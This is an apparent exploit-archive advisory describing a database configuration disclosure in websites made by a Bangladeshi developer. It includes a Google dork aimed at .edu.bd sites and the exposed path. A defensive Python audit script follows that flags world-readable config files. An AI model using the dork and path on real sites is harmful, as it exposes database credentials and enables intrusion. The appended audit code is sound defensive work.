- ######################################################################
- # Exploit Title : Momtaj Trading Pvt Ltd Bangladesh Database Configuration Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 02/05/2019
- # Vendor Homepage : momtajtdpl.com.bd
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-16 [ Configuration ]
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # Google Dorks : intext:Design & Developed By Momtaj Trading(Pvt) Ltd. site:edu.bd
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- #####################################################################
- # Impact :
- ***********
- The Momtaj Trading Pvt Ltd Bangladesh configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file is unintentionally stored in /online/admission/store.
- HTTP requests consisting of a single character will cause the software to disclose sensitive
- configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration file
- also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access the config file via a URL request. This may aid in further attacks.
- * The product stores sensitive information in files or directories that are accessible to actors
- outside of the intended control sphere.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- #####################################################################
- # Database Configuration File Disclosure Exploit :
- *******************************************
- /online/admission/store
- Information :
- *************
- SERVER_ADMIN =>
- Server IP Address =>
- DOCUMENT_ROOT =>
- DB_CONNECTION =>
- DB_HOST =>
- DB_PORT =>
- DB_DATABASE =>
- DB_USERNAME =>
- DB_PASSWORD =>
- #####################################################################
- # Example Vulnerable Sites :
- *************************
- #####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #####################################################################
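A defender-side audit for the misconfiguration this advisory describes, added here as an example and not part of the original paste: it walks a web root, flags files containing the DB_* keys from the "Information" list, and reports whether each is world-readable or world-writable without ever returning the values. The sample tree, file names and `placeholder` values are constructed assumptions.

```python
import os
import re
import stat
import tempfile

# Keys taken from the advisory's "Information" list.
SENSITIVE_KEYS = ("DB_PASSWORD", "DB_USERNAME", "DB_DATABASE", "DB_HOST")
# Matches KEY=value, KEY: value and KEY => "value"; the value is never captured.
KEY_RE = re.compile(r"\b(%s)\b\s*(?:=>|=|:)\s*\S" % "|".join(SENSITIVE_KEYS))

def audit_tree(docroot):
    """Return findings for files under docroot that hold DB settings."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.stat(path).st_mode
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(1_000_000)  # cap the per-file read
            except OSError:
                continue  # not readable by the auditing account; skip
            keys = sorted(set(KEY_RE.findall(text)))
            if not keys:
                continue
            findings.append({"path": os.path.relpath(path, docroot), "keys": keys,
                             "world_readable": bool(mode & stat.S_IROTH),
                             "world_writable": bool(mode & stat.S_IWOTH)})
    return sorted(findings, key=lambda f: f["path"])

def build_sample_tree(root):
    """Constructed sample docroot: one loose config file, one tight one."""
    loose = os.path.join(root, "online", "admission")
    os.makedirs(loose)
    samples = {
        os.path.join(loose, "config.env"): ("DB_HOST=localhost\nDB_PASSWORD=placeholder\n", 0o666),
        os.path.join(root, "private.env"): ("DB_PASSWORD=placeholder\n", 0o600),
        os.path.join(root, "index.html"): ("<h1>Admission</h1>\n", 0o644),
    }
    for path, (body, mode) in samples.items():
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)  # explicit chmod so the umask does not interfere

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in audit_tree(tmp):
            print(finding)
```

Any finding with `world_readable` or `world_writable` set inside the served document root is the condition the advisory calls out; such files belong outside the web root with owner-only permissions.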